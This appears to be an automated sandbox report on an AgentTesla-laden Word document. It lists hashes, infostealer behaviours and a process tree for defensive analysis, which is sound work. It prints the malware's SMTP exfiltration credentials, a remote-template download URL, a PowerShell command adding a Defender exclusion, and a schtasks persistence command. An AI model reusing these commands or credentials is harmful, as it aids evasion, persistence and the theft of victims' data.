Analysis
-
max time kernel
102s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-03-2023 07:00
Static task
static1
Behavioral task
behavioral1
Sample
POX010-240.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
POX010-240.docx
Resource
win10v2004-20230220-en
General
-
Target
POX010-240.docx
-
Size
10KB
-
MD5
1cb238263947b5019937888d3cad8833
-
SHA1
15d5367bd9cd0fb7fec8ca9ef2360b57a40c63c0
-
SHA256
3db84a830fee9dea668512769206f1002edf7d27747611f728c14974cd14726a
-
SHA512
d73cd6a02a2fb6f481a00b7e96d45b7091ac1a5a3fb57763923864fabacb2eb8c945150adf740a64d7d7eae94ac23c9b47b7471fc6e6a9a50f11aca051339748
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uO+A5Wgywl+CVWBXJC0c3hzVG:SPXU/slT+LO+mbywHkZC9K
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
002@frem-tr.com - Password:
jCXzqcP1 daniel 3116 - Email To:
002@frem-tr.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 7 900 EQNEDT32.EXE -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\14.0\Common WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\Common\Offline\Files\http://3324948138/rr........................................................doc WINWORD.EXE -
Executes dropped EXE 3 IoCs
Processes:
vbc.exevbc.exevbc.exepid process 1488 vbc.exe 568 vbc.exe 1316 vbc.exe -
Loads dropped DLL 2 IoCs
Processes:
EQNEDT32.EXEpid process 900 EQNEDT32.EXE 900 EQNEDT32.EXE -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
vbc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows\CurrentVersion\Run\gcWPrHZ = "C:\\Users\\Admin\\AppData\\Roaming\\gcWPrHZ\\gcWPrHZ.exe" vbc.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vbc.exedescription pid process target process PID 1488 set thread context of 1316 1488 vbc.exe vbc.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1248 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
vbc.exepowershell.exepid process 1488 vbc.exe 1488 vbc.exe 1488 vbc.exe 1488 vbc.exe 1936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
vbc.exevbc.exepowershell.exeWINWORD.EXEdescription pid process Token: SeDebugPrivilege 1488 vbc.exe Token: SeDebugPrivilege 1316 vbc.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1248 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1248 WINWORD.EXE 1248 WINWORD.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEvbc.exedescription pid process target process PID 900 wrote to memory of 1488 900 EQNEDT32.EXE vbc.exe PID 900 wrote to memory of 1488 900 EQNEDT32.EXE vbc.exe PID 900 wrote to memory of 1488 900 EQNEDT32.EXE vbc.exe PID 900 wrote to memory of 1488 900 EQNEDT32.EXE vbc.exe PID 1248 wrote to memory of 360 1248 WINWORD.EXE splwow64.exe PID 1248 wrote to memory of 360 1248 WINWORD.EXE splwow64.exe PID 1248 wrote to memory of 360 1248 WINWORD.EXE splwow64.exe PID 1248 wrote to memory of 360 1248 WINWORD.EXE splwow64.exe PID 1488 wrote to memory of 1936 1488 vbc.exe powershell.exe PID 1488 wrote to memory of 1936 1488 vbc.exe powershell.exe PID 1488 wrote to memory of 1936 1488 vbc.exe powershell.exe PID 1488 wrote to memory of 1936 1488 vbc.exe powershell.exe PID 1488 wrote to memory of 1580 1488 vbc.exe schtasks.exe PID 1488 wrote to memory of 1580 1488 vbc.exe schtasks.exe PID 1488 wrote to memory of 1580 1488 vbc.exe schtasks.exe PID 1488 wrote to memory of 1580 1488 vbc.exe schtasks.exe PID 1488 wrote to memory of 568 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 568 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 568 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 568 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe PID 1488 wrote to memory of 1316 1488 vbc.exe vbc.exe -
outlook_office_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe -
outlook_win_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"1⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gmRCHGfmw.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gmRCHGfmw" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1A17.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDFilesize
128KB
MD5052f9ec24e05d1d4e02e06b4dd9507f4
SHA1f3622165331f541f14abbbdba5a360f591318ef9
SHA2562984965f02436f5c9ce74e08c26d8e4bdbf978ddc4fd1ecbca7f6c56d3c72b34
SHA5128e65290c2b7553ab86e413d225aab4bd0b61108a00b29c0456898ff7fd21d598e50bbbce108bd2b31f6fda9042665f81e54c075f70e3124f01955e4ef53ca147
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FC43B91B-5F3D-4FCC-A693-00FFE98FFBDD}.FSDFilesize
128KB
MD58126e47d5e2f24324bbc8227b671d04a
SHA15a68a48b8066e17be9d4f37dbd7f438ac50c32cd
SHA25692489ef7b9e580ab62234b941ad7b05013013904e316d1b7effdf595e8bf24ef
SHA512e0475dd0721a69d48e276f4fa8b8e5cf01c7c0c982b5771e2e74426c941eaf9c3ac59be55a11d69d8f206066b5cf323b254c1061de7cc4f4f15440a8f3e36a70
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD5a0859b3ca3a5c07878c1bc3dd9221437
SHA156fb90b51bef7bf198777708a52904c254754b5d
SHA256ffb70ef528dd1e05e48033ccb9d69e6920e5fdf85acca9b8086ba3e64a2e930b
SHA512672cad2c7e4cdbe1b226f0ef22b3acfd22fb9ad0771591eb8d8149ec02ee6a595fc6e43f6878f1a19e043dbc41ade508655def18dcf2b3a1313e595210c9dc6e
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD5741ebcf2dccd2bbf834b01caff073b11
SHA10df0bff6114d7b504dc413affddbf971333a8b16
SHA256c84c4a14b6ed5d1d5f9bfaa4465a3d52553084353a934858ab327939f5e34438
SHA512cce86daa9608e67a2eff459544d75b09e6cf603d95f85b4c102c9c8fc59f566f0c2d27874baefef20bd63b193b4767bbbeb74d73a4fb5e9f51da502daace4fd5
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DC4C6444-BCB1-4DE8-A572-11D93416C241}.FSDFilesize
128KB
MD5f0ba8f1b90d6fded12baadee98f4cb99
SHA166ffcd9002cf8bf6ab98baf93321053e5e8a0cab
SHA256e7d6c56cd71ae0f6d9ab50258ccd3c2ca2b5b0432c4b3fa7f5befbf592544ef1
SHA512aba3db56ca2443160a67f1881114cf119543a543ed6c2e54051da2da1da0da6efbd370b0389dc8f35cbd724bc6d7de06a8c6700274bf640f80b64bad38f27d45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QCNSQOTT\rr[1].docFilesize
12KB
MD5dbca576eca2dd4201a06f467ada3d524
SHA1489ea5b066263a10ca81db28eed66545c6d2d4b2
SHA256d90badc8f1680f191a5822f37582cc2e8ed39d044627c071812ad947b8a0a90f
SHA512e48edabcbc2bc1f6d7ad91ffa5cd91e06c77ae7d4b074fb7eb15b20e8afe1f39229cb1be7921b18e3fb94f8c30e20ba61a22d46eafeb70229aa52722d99d7b2d
-
C:\Users\Admin\AppData\Local\Temp\tmp1A17.tmpFilesize
1KB
MD52dfe08f3ee47da656ba22385a6e085f7
SHA179c438e0a645fa7bf714a59b6f419e46af637d5f
SHA2568c557bfebc17cb768e3ddff8e2519ba5ebbdbb821973a08f06ab1538013b4cfd
SHA51296380a7f2ba15bb2cca589baed2a36f129868bc37a3d887eadbf02459f2f1d3c05c1c3ebaf1b3b5f9343d0045f1c7cc0fa7d0a92210863b251db4f50530c74e9
-
C:\Users\Admin\AppData\Local\Temp\{5C9D101B-BDBE-4CD7-8920-1435D9A7B6C4}Filesize
128KB
MD5f2d7d7559ef3b630eee4ad9b2220d255
SHA1f9e8fb2699cd5f51f10188d530d3cc527151d1a1
SHA256912cdbf8789f99ba1d324127f130b02a3cf938d6cc0c3ecf3440fb94b52858e2
SHA512b215351a7c2a0e4de376730e3ef26f7aafbbc5493e83de7b35fdf052d6882fb1f5c95eb4d469bcdaff395ed551156f25656eac1d11e36e73d955dfb64ea23407
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
105B
MD5ef5c93397775c0240daba47626ee0b22
SHA1e64cb17cb9e1af3a3d7689f786436873005c2a12
SHA256fc0ea4509f1e1c815f59e36b6d991d21e4aaf220b17985f27b8cd566d9e8b9d7
SHA5128bbd258c2696f41fdf4367adfbde9b96583479c7ab3d0c516edd3b4ecea4dcdbabdbacb85dd5264609f374b6f9ed38d47bd5c351e30bac8ee9f0757feee022fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5d91bf19fdabe71bac54559f2ffd9a0dd
SHA1a13e7ab25ae6df36ef64faebc718a758864d2f9a
